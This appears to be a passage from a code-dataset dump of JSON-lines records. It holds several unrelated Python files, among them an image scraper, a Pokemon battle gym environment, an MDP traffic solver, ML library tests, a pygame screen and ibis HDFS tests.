'email@email.com',\n    'pgadmin_password': 'strongpassowrd',\n}\n\nif __name__ =='__main__':\n    main()\n    print(f\"PG Admin email: {TAGS['pgadmin_email']}\")\n    print(f\"PG Admin password: {TAGS['pgadmin_password']}\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"337297625","text":"# Example of using shell-wildcard style matching in list comprehensions\r\n\r\nfrom fnmatch import fnmatchcase as match\r\n\r\naddresses = [\r\n    '5412 N CLARK ST',\r\n    
'1060 W ADDISON ST',\r\n '1039 W GRANVILLE AVE',\r\n '2122 N CLARK ST',\r\n '4802 N BROADWAY',\r\n]\r\n\r\na = [addr for addr in addresses if match(addr, '* ST')]\r\nprint(a)\r\n\r\nb = [addr for addr in addresses if match(addr, '54[0-9][0-9] *CLARK*')]\r\nprint(b)\r\n\r\nimport os\r\n\r\nfilenames = os.listdir(r'C:\\Users\\bach\\Downloads')\r\nprint(filenames)\r\n\r\n# List comprehension - http://www.diveintopython3.net/comprehensions.html#listcomprehension\r\nfilter = [name for name in filenames if name.endswith(('.mp4', '.wmv'))]\r\nprint('\\'filter\\' = ', filter)\r\n\r\nprint(any(name.endswith('.wmv') for name in filenames))\r\n","sub_path":"~src/src_python_cookbook/02/matching_strings_using_shell_wildcard_patterns/matching_strings_using_shell_wildcard_patterns.py","file_name":"matching_strings_using_shell_wildcard_patterns.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"624487436","text":"# 請修改:\n# 1.存圖位置\n# 2.爬取頁面網址\n# 3.啟動chrome瀏覽器\n# 4.請依照景點名稱更改'_???????',到單引號中底線後面\n\nfrom selenium import webdriver\nimport time\nimport urllib.request\nimport os\n\n# 相同路徑\nfirstPath = './'\n\n# 英文景點名\nS = 'Gullfoss Waterfall, Iceland'\n# xpath = '//div[@id=\"imgid\"]/ul/li/a/img'\nxpath = '//div[@class=\"figure-result\"]/ul/li/div/a/img'\n\n# 存圖位置 需要先建好資料夾\nlocal_path = firstPath + S + '/'\nurl = 'https://pic.sogou.com/pics?query=' + S + '&di=2&_asf=pic.sogou.com&w=05009900'\n\n# 啟動chrome瀏覽器\nchromeDriver = firstPath + 'chromedriver/chromedriver' # chromedriver檔案放的位置\ndriver = webdriver.Chrome(chromeDriver)\n\n# 最大化窗口,因為每一次爬取只能看到視窗内的圖片\ndriver.maximize_window()\n\n# 紀錄下載過的圖片網址,避免重複下載\nimg_url_dic = {}\n\n# 瀏覽器打開爬取頁面\ndriver.get(url)\n\n# 模擬滾動視窗瀏覽更多圖片\npos = 0\nm = 0 # 圖片編號\nfor i in range(100):\n pos += i * 500 # 每次下滾500\n js = \"document.documentElement.scrollTop=%d\" % pos\n driver.execute_script(js)\n time.sleep(1)\n\n for element in driver.find_elements_by_xpath(xpath):\n try:\n img_url = element.get_attribute('src')\n\n # 保存圖片到指定路徑\n if img_url != None and not img_url in img_url_dic:\n img_url_dic[img_url] = ''\n m += 1\n ext = img_url.split('/')[-1]\n filename = str(m) + '_' + S + '_' + ext + '.jpg'\n print(filename)\n\n # 保存圖片\n urllib.request.urlretrieve(img_url, os.path.join(local_path, filename))\n\n except OSError:\n print('發生OSError!')\n print(pos)\n break\n\ndriver.close()\n","sub_path":"WebCrawler/sogou.py","file_name":"sogou.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598780884","text":"import numpy as np\nimport subprocess\nimport signal\nimport gym.spaces\n\n\nall_moves = ['bodyslam', 'hyperbeam', 'earthquake', 'tackle']\n\n\ndef readlines(sp, numlines):\n output = []\n for i in range(numlines):\n output.append(sp.stdout.readline())\n return output\n\n\ndef readuntil(sp, breakline):\n output = []\n line = sp.stdout.readline()\n while not line == breakline:\n output.append(line)\n line = sp.stdout.readline()\n return output\n\n\ndef string_to_array(raw):\n return raw.replace(' ', '_').replace(',', ' ').replace(':', ' ').replace('\"', ' ').replace('/', ' ').replace(\n '[', ' ').replace(']', ' ').replace('{', ' ').replace('}', ' ').split()\n\n\nclass PokeGym(gym.Env):\n def __init__(self):\n self.action_space = gym.spaces.Tuple((\n gym.spaces.Box(low=0, high=1, shape=(4,)),\n gym.spaces.Box(low=0, high=1, shape=(4,))))\n self.observation_space = gym.spaces.Tuple((\n 
gym.spaces.Box(low=0, high=1, shape=(12,)),\n gym.spaces.Box(low=0, high=1, shape=(12,))))\n self.num_players = 2\n self.sim = None\n self.hp = None\n self.pp = None\n self.recharge = None\n self.s = None\n\n def render(self, mode='human'):\n # TODO this\n pass\n\n def reset(self):\n if self.sim is not None:\n self.sim.send_signal(signal.SIGINT)\n self.sim = subprocess.Popen(['./pokemon-showdown', 'simulate-battle'],\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n bufsize=1, universal_newlines=True)\n self.sim.stdin.write('>start {\"formatid\":\"gen1ou\"}\\n')\n self.sim.stdin.write('>player p1 {\"name\":\"A\",\"team\":\"Tauros|||none|bodyslam,hyperbeam,earthquake,tackle||255,255,255,255,255,255||30,30,30,30,30,30||100|\"}\\n')\n self.sim.stdin.write('>player p2 {\"name\":\"B\",\"team\":\"Tauros|||none|bodyslam,hyperbeam,earthquake,tackle||255,255,255,255,255,255||30,30,30,30,30,30||100|\"}\\n')\n # readlines(self.sim,44)\n self.hp = np.array([1.0]*2)\n self.pp = np.array([[1.0]*4]*2)\n self.recharge = np.array([False]*2)\n self.s = self.get_state()\n return self.s\n\n def step(self, action):\n r = (0, 0)\n a = [\"\"]*self.num_players\n for p in range(self.num_players):\n # TODO Pick a strategy by only allowing valid moves, normalizing the outputs then selecting randomly\n if self.recharge[p]:\n a[p] = 'recharge'\n self.recharge[p] = False\n else:\n rand = np.random.random()\n cum_prob = np.cumsum(action)\n for prob in cum_prob:\n if rand < prob:\n a[p] = all_moves[action[p]]\n break\n self.sim.stdin.write('>p'+str(p+1)+' move '+a[p]+'\\n')\n if a[p] == 'recharge' and p == 0:\n readuntil(self.sim, '\\n')\n raw = readuntil(self.sim,'\\n')\n if raw[-1] == '|win|A\\n':\n r = (1, -1)\n if raw[-1] == '|win|B\\n':\n r = (-1, 1)\n # TODO If the person used Hyper Beam you'll have to manually change the PP values since they don't display\n if r == (0, 0):\n self.hp = [None]*self.num_players\n for p in range(self.num_players):\n data = string_to_array(raw[2])\n if data[6] == \"recharge\":\n self.recharge[p] = True\n self.hp[p] = float(data[21])/float(data[22])\n else:\n self.pp[p] = []\n for val in [8, 20, 32, 44]:\n self.pp[p].append(float(data[val])/float(data[val+2]))\n self.hp[p] = float(data[63])/float(data[64])\n raw = readuntil(self.sim, '\\n')\n self.s = self.get_state()\n return self.s, r, (False, False), ({}, {})\n else:\n self.sim.send_signal(signal.SIGINT)\n self.sim = None\n # TODO Still update the state? 
Or does it even matter?\n infos = [{}, {}]\n if r == (1, -1):\n infos = [{'winner': True}, {}]\n if r == (-1, 1):\n infos = [{}, {'winner': True}]\n return self.s, r, (True, True), infos\n\n def get_state(self):\n state = [None]*self.num_players\n for p in range(self.num_players):\n state[p] = np.concatenate(([self.hp[p]], self.pp[p], [self.recharge[p]],\n [self.hp[1-p]], self.pp[1-p], [self.recharge[1-p]]), axis=0)\n return tuple(state)\n","sub_path":"pokegym.py","file_name":"pokegym.py","file_ext":"py","file_size_in_byte":4768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"27900539","text":"import numpy as np\nfrom cvxopt import matrix, solvers\nimport scmdp_solver.gsc_mdp as GSC\nimport copy as cp\nimport roulette\nfrom tempfile import TemporaryFile\n\nfrom config import *\nimport world\nimport car\nimport state\n\nnp.set_printoptions(linewidth = 1000, precision = 3, suppress = True, threshold = 'nan')\n\ndef print_m(matrix):\n '''visualize a 2d matrix'''\n (row,col) = np.shape(matrix)\n print(\" \"),\n for j in range(col):\n print(str(j) + ' '),\n print(\" \")\n for i in range(row):\n print(i, matrix[i])\n\ndef print_part(matrix, row_s, row_e, col_s, col_e):\n print(\"{:<4}\".format(' ')), # print head\n for j in range(col_e - col_s + 1): # print col numbers\n print(\"{:<4}\".format(j)),\n print('\\n'),\n for i in range(row_s, row_e + 1):\n print(\"{:<4}\".format(i)), # print row numbers\n for j in range(col_s, col_e + 1):\n print(\"{:<4}\".format(matrix[i,j])),\n print('\\n'),\n\nclass SCMDP:\n def __init__(self, world_, sdic_, T, A, m, trans_suc_rate):\n self.world = world_\n self.sdic = sdic_ \n self.T = T # length of planning horizon\n self.n = self.sdic.n # number of states\n self.A = A # number of actions\n self.m = m # number of constraints\n self.trans_suc_rate = trans_suc_rate # transition success rate \n\n # construct transition matrix G\n self.construct_G() \n # construct reward matrix R (over T-1 horizon)\n self.construct_RT() \n self.construct_R()\n # construct density vector\n self.construct_d()\n # construct L matrix\n self.construct_L()\n # initial distribution of the agents \n self.construct_x0()\n # discount factor\n self.gamma = 0.99\n \n # policy matrix\n self.bf_Q = []; self.bf_x = []; self.phi_Q = []; self.phi_x = []; self.un_Q = []; self.un_x = []\n\n def construct_G(self):\n '''A x n x n'''\n self.G = np.zeros((self.A, self.n, self.n))\n for act in range(self.A):\n if act == STAY:\n self.G[act,:,:] = np.eye(self.n) # stay results in an identity matrix\n else:\n # probability from j to i\n G_act = np.zeros((self.n, self.n))\n for j in range(self.n):\n state_j = self.sdic.get_state(j) # start from this state\n loc_j = [state_j[0], state_j[1]]\n result_loc = self.world.move_consq(loc_j, act)\n for i in range(self.n):\n state_i = self.sdic.get_state(i)\n loc_i = [state_i[0], state_i[1]]\n if state.same_loc(result_loc, loc_i) \\\n and state_i[2] == state_j[2] and state_i[3] == state_j[3] and state_i[4] == state_j[4]:\n G_act[i][j] = 1\n self.G[act,:,:] = cp.deepcopy(G_act)\n #print_part(self.G[LEFT], 0, 167, 167, 167)\n #print(np.shape(self.G))\n\n def construct_RT(self):\n ''' n x 1'''\n self.RT = np.zeros((self.n,1)) \n for i in range(self.n):\n state_vec = self.sdic.get_state(i)\n # if the current position is equal to destination\n if state.same_loc([state_vec[0], state_vec[1]], [state_vec[2], state_vec[3]]):\n self.RT[i,0] = REWARD\n #print_m(self.RT)\n\n def construct_R(self):\n ''' (T-1) x n x A'''\n 
self.R = np.zeros((self.T-1, self.n, self.A))\n R0 = np.zeros((self.n, self.A))\n for a in range(self.A):\n R0[:,a] = cp.deepcopy(self.RT[:,0])\n for t in range(self.T-1):\n self.R[t,:,:] = cp.deepcopy(R0)\n # print_m(self.R[1])\n\n def construct_L(self):\n ''' m x n'''\n #self.L = np.zeros((self.m, self.n))\n # note: if we have more than two types of car this need to change\n I_SMALL = CAP_SMALL * np.eye(self.m) # small car\n I_BIG = CAP_BIG * np.eye(self.m) # big car\n self.L = I_SMALL\n for i in range(len(DESTINATION) - 1):\n self.L = np.append(self.L, I_SMALL, axis = 1)\n for i in range(len(DESTINATION)):\n self.L = np.append(self.L, I_BIG, axis = 1)\n # print_m(self.L)\n\n def construct_d(self):\n ''' m x 1'''\n self.d = np.zeros((self.m, 1))\n state_count = 0\n for i in range(self.world.rows):\n for j in range(self.world.columns):\n if self.world.world_map[i][j].block_type != OFFROAD:\n self.d[state_count, 0] = 1.0 * self.world.world_map[i][j].cap_bound / NUM_CAR\n state_count += 1\n print_m(self.d)\n\n def construct_x0(self):\n ''' n x 1, assume cars are distributed equally in start '''\n self.x0 = np.zeros((self.n, 1))\n for i in range(self.n):\n state_vec = self.sdic.get_state(i)\n start_pos = [state_vec[0], state_vec[1]]\n if not(start_pos in START):\n continue\n else:\n des_pos = [state_vec[2], state_vec[3]]\n if state.same_loc(DESTINATION[START.index(start_pos)], des_pos):\n self.x0[i, 0] = INIT_DENSITY_CORNER\n # print_m(self.x0)\n\n def solve(self):\n [self.un_Q, self.un_x, self.phi_Q, self.phi_x, self.bf_Q, self.bf_x] = GSC.mdp(self.G, self.R, self.RT, self.L, self.d, self.x0, self.gamma)\n print(\"scmdp policy solved\")\n# print(self.bf_Q)\n print(np.dot(self.L, self.bf_x))\n# res_un = np.dot(self.d, np.ones((1, self.T))) - np.dot(self.L, un_x)\n# res_phi = np.dot(self.d, np.ones((1, self.T))) - np.dot(self.L, phi_x)\n# res_bf = np.dot(self.d, np.ones((1, self.T))) - np.dot(self.L, bf_x)\n# print(np.amin(res_un))\n# print(np.amin(res_phi))\n# print(np.amin(res_bf))\n# print(np.dot(self.L,un_x))\n# print(np.dot(self.L,phi_x))\n# print(np.dot(self.L,bf_x))\n\n def save_to_file(self):\n '''save un_Q, un_x, phi_Q, phi_x, bf_Q, bf_x to .npy files'''\n np.save(\"policy/un_Q\", self.un_Q)\n np.save(\"policy/un_x\", self.un_x)\n np.save(\"policy/phi_Q\", self.phi_Q)\n np.save(\"policy/phi_x\", self.phi_x)\n np.save(\"policy/bf_Q\", self.bf_Q)\n np.save(\"policy/bf_x\", self.bf_x)\n\n def load_from_file(self):\n self.un_Q = np.load(\"policy/un_Q.npy\")\n self.un_x = np.load(\"policy/un_x.npy\")\n self.phi_Q = np.load(\"policy/phi_Q.npy\")\n self.phi_x = np.load(\"policy/phi_x.npy\")\n self.bf_Q = np.load(\"policy/bf_Q.npy\")\n self.bf_x = np.load(\"policy/bf_x.npy\")\n\n def choose_act(self, state, T):\n policy = self.bf_Q[T][state]\n # print(\"Policy vector\", policy)\n roulette_selector = roulette.Roulette(policy)\n action = roulette_selector.select()\n # print(\"Action selected:\", action)\n return action\n\n def choose_act_phi(self, state, T):\n policy = self.phi_Q[T][state]\n # print(\"Policy vector\", policy)\n roulette_selector = roulette.Roulette(policy)\n action = roulette_selector.select()\n # print(\"Action selected:\", action)\n return action\n\nif __name__ == \"__main__\":\n # call solve and store resulted matrices\n test_world = world.World()\n state_dict = state.StateDict(test_world) \n scmdp_solver = SCMDP(world_ = test_world, sdic_ = state_dict, T = 10, m = test_world.num_road, A = len(ACTIONS), trans_suc_rate = TRANS_SUC_RATE)\n scmdp_solver.solve()\n 
scmdp_solver.save_to_file()\n","sub_path":"traffic/scmdp.py","file_name":"scmdp.py","file_ext":"py","file_size_in_byte":7578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448225833","text":"import pytest\nfrom examples import thermometers\nfrom py4j.protocol import Py4JJavaError\nfrom keanu import KeanuRandom, BayesNet, Model\nfrom keanu.algorithm import GradientOptimizer\n\n\n@pytest.fixture\ndef model() -> Model:\n KeanuRandom.set_default_random_seed(1)\n model = thermometers.model()\n\n model.thermometer_one.observe(22.0)\n model.thermometer_two.observe(20.0)\n return model\n\n\ndef test_gradient_op_bayes_net(model: Model) -> None:\n net = BayesNet(model.temperature.get_connected_graph())\n gradient_optimizer = GradientOptimizer(net)\n assert gradient_optimizer.net is net\n\n\ndef test_gradient_op_vertex(model: Model) -> None:\n gradient_optimizer = GradientOptimizer(model.temperature)\n assert len(list(gradient_optimizer.net.get_latent_vertices())) == 1\n\n\ndef test_gradient_op_throws_with_invalid_net_param() -> None:\n with pytest.raises(TypeError) as excinfo:\n GradientOptimizer(500) # type: ignore # this is expected to fail mypy\n\n assert str(excinfo.value) == \"net must be a Vertex or a BayesNet. Was given {}\".format(int)\n\n\ndef test_gradient_can_set_max_eval_builder_properties(model: Model) -> None:\n gradient_optimizer = GradientOptimizer(model.temperature, max_evaluations=5)\n\n with pytest.raises(Py4JJavaError):\n #This throws a Gradient Optimizer: \"Reached Max Evaluations\" error\n logProb = gradient_optimizer.max_a_posteriori()\n\n\ndef test_thermometers_map_gradient(model: Model) -> None:\n net = BayesNet(model.temperature.get_connected_graph())\n gradient_optimizer = GradientOptimizer(net)\n logProb = gradient_optimizer.max_a_posteriori()\n assert logProb < 0.\n\n temperature = model.temperature.get_value()\n assert 20.995 < temperature < 21.005\n\n\ndef test_thermometers_max_likelihood_gradient(model: Model) -> None:\n net = BayesNet(model.temperature.get_connected_graph())\n gradient_optimizer = GradientOptimizer(net)\n logProb = gradient_optimizer.max_likelihood()\n assert logProb < 0.\n\n temperature = model.temperature.get_value()\n assert 20.995 < temperature < 21.005\n","sub_path":"keanu-python/tests/test_gradient_optimization.py","file_name":"test_gradient_optimization.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"257124142","text":"#!/usr/bin/env python\n\"\"\"\nTest wer calculation\n\"\"\"\n\nimport json\n\nfrom utils import get_sample_dir, get_test_dir\n\nfrom asrtoolkit.data_structures import Transcript\n\ntest_dir = get_test_dir(__file__)\nsample_dir = get_sample_dir(__file__)\n\n\ndef test_json_initialization():\n \"execute single test\"\n\n input_dict = json.load(open(f\"{sample_dir}/BillGatesTEDTalk.json\"))\n text_object = Transcript(input_dict, file_format=\"greenkey\")\n\n ref = (\n open(f\"{sample_dir}/BillGatesTEDTalk_transcribed.stm\", \"r\", encoding=\"utf8\")\n .read()\n .strip()\n )\n text_object.write(f\"{test_dir}/file_conversion_test.stm\")\n new = (\n open(f\"{test_dir}/file_conversion_test.stm\", \"r\", encoding=\"utf8\")\n .read()\n .strip()\n )\n assert ref == new\n\n\ndef test_txt_initialization():\n \"execute single test\"\n\n input_dict = json.load(open(f\"{sample_dir}/BillGatesTEDTalk.json\"))\n text = Transcript(input_dict, file_format=\"greenkey\")\n text.file_extension = 
\"txt\"\n\n text_object = Transcript(text.__str__())\n\n ref = (\n open(f\"{sample_dir}/BillGatesTEDTalk_transcribed.txt\", \"r\", encoding=\"utf8\")\n .read()\n .strip()\n )\n text_object.write(f\"{test_dir}/file_conversion_test.txt\")\n new = (\n open(f\"{test_dir}/file_conversion_test.txt\", \"r\", encoding=\"utf8\")\n .read()\n .strip()\n )\n assert ref == new\n\n\nif __name__ == \"__main__\":\n import sys\n\n import pytest\n\n pytest.main(sys.argv)\n","sub_path":"tests/test_initialization.py","file_name":"test_initialization.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326891218","text":"import pickle\nimport json\n\nimport numpy as np\n\n\ndef calc_iou(ax0,ay0,ax1,ay1,bx0,by0,bx1,by1):\n dx = max(0, min(ax1, bx1) - max(ax0, bx0))\n dy = max(0, min(ay1, by1) - max(ay0, by0))\n area_cross = dx * dy\n area_a = (ax1-ax0) * (ay1-ay0)\n area_b = (bx1-bx0) * (by1-by0)\n return area_cross / (area_a + area_b - area_cross)\n\ndef rect(x1,y1,x2,y2):\n return [x1,x1,x2,x2,x1], [y1,y2,y2,y1,y1]\n\ndef rotm90(boxes, dx):\n xmin = dx - boxes[:,3]\n ymin = boxes[:,0].copy()\n xmax = dx - boxes[:,1]\n ymax = boxes[:,2].copy()\n boxes[:,0] = xmin\n boxes[:,1] = ymin\n boxes[:,2] = xmax\n boxes[:,3] = ymax\n return boxes\n\ndef rotm180(boxes, dx):\n xmin = dx - boxes[:,2].copy()\n ymin = dx - boxes[:,3].copy()\n xmax = dx - boxes[:,0].copy()\n ymax = dx - boxes[:,1].copy()\n boxes[:,0] = xmin\n boxes[:,1] = ymin\n boxes[:,2] = xmax\n boxes[:,3] = ymax\n return boxes\n\ndef rotm270(boxes, dx):\n xmin = boxes[:,1].copy()\n ymin = dx - boxes[:,2].copy()\n xmax = boxes[:,3].copy()\n ymax = dx - boxes[:,0].copy()\n boxes[:,0] = xmin\n boxes[:,1] = ymin\n boxes[:,2] = xmax\n boxes[:,3] = ymax\n return boxes\n\ndef arrange(data, threshold=0.4, rate=1.0, ang=0):\n anns = []\n for k in range(len(data)):\n x0, y0, dx, boxes, labels, scores = data[k]\n boxes = boxes.reshape([-1,4]) * rate\n if ang == 90:\n boxes = rotm90(boxes, dx)\n elif ang == 180:\n boxes = rotm180(boxes, dx)\n elif ang == 270:\n boxes = rotm270(boxes, dx)\n labels = labels.flatten()\n scores = scores.flatten()\n for i in range(boxes.shape[0]):\n x1 = boxes[i,0] + x0\n y1 = boxes[i,1] + y0\n x2 = boxes[i,2] + x0\n y2 = boxes[i,3] + y0\n if boxes[i,0] < 1 or boxes[i,1] < 1 or boxes[i,2] > dx-1 or boxes[i,3] > dx-1:\n continue\n if scores[i] > threshold:\n anns.append([[x1,y1,x2,y2],labels[i],scores[i]])\n return anns\n\n\ndef drop(anns, threshold=0.6):\n drop_ids = []\n for i_a, ann_a in enumerate(anns):\n if i_a in drop_ids:\n continue\n box_a, label_a, score_a = ann_a\n for i_b, ann_b in zip(np.arange(len(anns))[i_a+1:], anns[i_a+1:]):\n if i_b in drop_ids:\n continue\n box_b, label_b, score_b = ann_b\n iou = calc_iou(*box_a, *box_b)\n if iou > threshold:\n if score_a < score_b:\n drop_ids.append(i_a)\n break\n else:\n drop_ids.append(i_b)\n new_anns = []\n for i0, ann in enumerate(anns):\n if i0 in drop_ids:\n continue\n new_anns.append(ann)\n new_anns = sorted(new_anns, key=lambda x:x[2], reverse=True)\n return new_anns\n\ndef convert2dict(anns):\n labels = {'ship_moving':[], 'ship_not_moving':[], 'barge':[]}\n for box, label, _ in anns:\n if label == 0:\n labels['ship_moving'].append(box)\n elif label == 1:\n labels['ship_not_moving'].append(box)\n elif label == 2:\n labels['barge'].append(box)\n else:\n assert False\n return labels\n\ndef mk_label(index, size):\n image_name = f'test_{index:0>2}.jpg'\n \n with 
open(f\"data/det_pred_ang0/test_{index:0>2}.p\", \"rb\") as f:\n data = pickle.load(f)\n anns0 = arrange(data, rate=192/256, ang=0)\n with open(f\"data/det_pred_ang90/test_{index:0>2}.p\", \"rb\") as f:\n data = pickle.load(f)\n anns90 = arrange(data, rate=192/256, ang=90)\n with open(f\"data/det_pred_ang180/test_{index:0>2}.p\", \"rb\") as f:\n data = pickle.load(f)\n anns180 = arrange(data, rate=192/256, ang=180)\n with open(f\"data/det_pred_ang270/test_{index:0>2}.p\", \"rb\") as f:\n data = pickle.load(f)\n anns270 = arrange(data, rate=192/256, ang=270)\n \n anns0.extend(anns90)\n anns0.extend(anns180)\n anns0.extend(anns270)\n \n anns = drop(anns0, threshold=0.8)\n labels = convert2dict(anns)\n print(image_name)\n for key in labels.keys():\n print(f\"#{key}: {len(labels[key])}\")\n print(\"------------------------\")\n return image_name, labels\n\ndef main():\n from joblib import Parallel, delayed\n processed = Parallel(n_jobs=10)([delayed(mk_label)(i, 192) for i in range(21)])\n \n submits = dict()\n for image_name, labels in processed:\n submits[image_name] = labels\n\n with open('submits/19021403_0.4_0.8.json', \"w\") as f:\n json.dump(submits, f)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","sub_path":"mk_submit.py","file_name":"mk_submit.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"301862561","text":"import pygame, time\nimport threading\nimport sp_mp, Settings\n\ndef CreateGameWindow(width, height):\n pygame.display.set_caption(\"Checkers !\")\n gameWindow = pygame.display.set_mode((width, height))\n return gameWindow\n\ndef WriteText(text, text_pos_x, text_pos_y, text_size):\n text_font = pygame.font.SysFont(None, text_size)\n text_render = text_font.render(text, True, Black)\n gameWindow.blit(text_render, (text_pos_x, text_pos_y))\n\nclass CreateButton():\n def layout(self,button):\n pygame.draw.rect(gameWindow, button[4], (button[0], button[1], button[2], button[3]))\n\n def text(self, button, space_x, space_y):\n WriteText(button[5], button[0] + space_x, button[1] + space_y, button[6])\n\n def Animate(self, button, actual_color, animate_color):\n mouse_x, mouse_y = pygame.mouse.get_pos()\n if mouse_x >= button[0] and mouse_y >= button[1] and mouse_x <= button[0] + button[2] and mouse_y <= button[1] + button[3]:\n button[7] += 1\n if button[7] == 1:\n button[6] += 1\n button[4] = animate_color\n else:\n button[4] = actual_color\n button[6] = 30\n button[7] = 0\n\n#Colors:\nWhite = (255,255,255)\nBlack = (0,0,0)\nGray = (128,128,128)\nLightWhite = (160,160,160)\nLightGreen = (0,210,0)\nBrightGreen = (0,255,0)\nLightRed = (150,0,0)\nBrightRed = (255,0,0)\nLightBlue = (0,0,200)\nBrightBlue = (0,0,255)\n\n#Dimensions:\ngameWindow_width = 680\ngameWindow_height = 680\n\ngameWindow = CreateGameWindow(gameWindow_width,gameWindow_height)\n\ndef ShowWinner(Player):\n while True:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n\n gameWindow.fill(Gray)\n\n player_details = [250, gameWindow_height/2 - 100, 260 ,500, LightGreen, Player, 30, 0]\n\n createButton = CreateButton()\n #createButton.layout(player_details)\n createButton.text(player_details, 56, 20)\n\n pygame.display.update()\n\n for key in pygame.event.get():\n if key.type == pygame.QUIT:\n pygame.quit()\n\nShowWinner('player 1')","sub_path":"Back up/Win.py","file_name":"Win.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"439524230","text":"# Copyright 2014 Cloudera Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom six import BytesIO\n\nfrom posixpath import join as pjoin\nfrom os import path as osp\nimport os\nimport shutil\n\nimport pytest\n\nfrom ibis.filesystems import HDFS\nfrom ibis.compat import unittest\nfrom ibis.impala.tests.common import IbisTestEnv\nimport ibis.compat as compat\nimport ibis.util as util\nimport ibis\n\n\nENV = IbisTestEnv()\n\n\nclass MockHDFS(HDFS):\n\n def __init__(self):\n self.ls_result = []\n\n def set_ls(self, results):\n self.ls_result = results\n\n def ls(self, *args, **kwargs):\n return self.ls_result\n\n\nclass TestHDFSRandom(unittest.TestCase):\n\n def setUp(self):\n self.con = MockHDFS()\n\n def test_find_any_file(self):\n ls_contents = [(u'foo',\n {u'type': u'DIRECTORY'}),\n (u'bar.tmp',\n {u'type': u'FILE'}),\n (u'baz.copying',\n {u'type': u'FILE'}),\n (u'_SUCCESS',\n {u'type': u'FILE'}),\n (u'.peekaboo',\n {u'type': u'FILE'}),\n (u'0.parq',\n {u'type': u'FILE'}),\n (u'_FILE',\n {u'type': u'DIRECTORY'})]\n\n self.con.set_ls(ls_contents)\n\n result = self.con._find_any_file('/path')\n assert result == '0.parq'\n\n\n@pytest.mark.hdfs\nclass TestHDFSE2E(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.ENV = ENV\n cls.tmp_dir = pjoin(cls.ENV.tmp_dir, util.guid())\n if cls.ENV.auth_mechanism in ['GSSAPI', 'LDAP']:\n print(\"Warning: ignoring invalid Certificate Authority errors\")\n cls.hdfs = ibis.hdfs_connect(host=cls.ENV.nn_host,\n port=cls.ENV.webhdfs_port,\n auth_mechanism=cls.ENV.auth_mechanism,\n verify=(cls.ENV.auth_mechanism\n not in ['GSSAPI', 'LDAP']))\n cls.hdfs.mkdir(cls.tmp_dir)\n\n @classmethod\n def tearDownClass(cls):\n try:\n cls.hdfs.rmdir(cls.tmp_dir)\n except:\n pass\n\n def setUp(self):\n self.test_files = []\n self.test_directories = []\n\n def tearDown(self):\n self._delete_test_files()\n pass\n\n def _delete_test_files(self):\n for path in self.test_files:\n try:\n os.remove(path)\n except os.error:\n pass\n\n for path in self.test_directories:\n try:\n shutil.rmtree(path)\n except os.error:\n pass\n\n def _make_test_directory(self, files=5, filesize=1024, directory=None):\n if directory is None:\n directory = util.guid()\n os.mkdir(directory)\n self.test_directories.append(directory)\n\n for i in range(files):\n self._make_random_file(size=filesize, directory=directory)\n\n return directory\n\n def _make_random_file(self, size=1024, directory=None):\n path = util.guid()\n\n if directory:\n path = osp.join(directory, path)\n\n units = size / 32\n\n with open(path, 'wb') as f:\n for i in range(int(units)):\n f.write(guidbytes())\n\n self.test_files.append(path)\n return path\n\n def _make_random_hdfs_file(self, size=1024, directory=None):\n local_path = self._make_random_file(size=size)\n remote_path = pjoin(directory or self.tmp_dir, local_path)\n self.hdfs.put(remote_path, local_path)\n return remote_path\n\n def test_mkdir(self):\n path = pjoin(self.tmp_dir, 'mkdir-test')\n self.hdfs.mkdir(path)\n assert 
self.hdfs.exists(path)\n\n def test_chmod(self):\n new_permissions = '755'\n path = self._make_random_hdfs_file()\n self.hdfs.chmod(path, new_permissions)\n assert self.hdfs.status(path)['permission'] == new_permissions\n\n def test_chmod_directory(self):\n new_permissions = '755'\n path = pjoin(self.tmp_dir, util.guid())\n self.hdfs.mkdir(path)\n self.hdfs.chmod(path, new_permissions)\n assert self.hdfs.status(path)['permission'] == new_permissions\n\n def test_mv_to_existing_file(self):\n remote_file = self._make_random_hdfs_file()\n existing_remote_file_dest = self._make_random_hdfs_file()\n self.hdfs.mv(remote_file, existing_remote_file_dest)\n\n def test_mv_to_existing_file_no_overwrite(self):\n remote_file = self._make_random_hdfs_file()\n existing_remote_file_dest = self._make_random_hdfs_file()\n with self.assertRaises(Exception):\n self.hdfs.mv(remote_file, existing_remote_file_dest,\n overwrite=False)\n\n def test_mv_to_directory(self):\n remote_file = self._make_random_hdfs_file()\n dest_dir = pjoin(self.tmp_dir, util.guid())\n self.hdfs.mkdir(dest_dir)\n self.hdfs.mv(remote_file, dest_dir)\n new_remote_file = pjoin(dest_dir, os.path.basename(remote_file))\n file_status = self.hdfs.status(new_remote_file)\n assert file_status['type'] == 'FILE'\n\n def 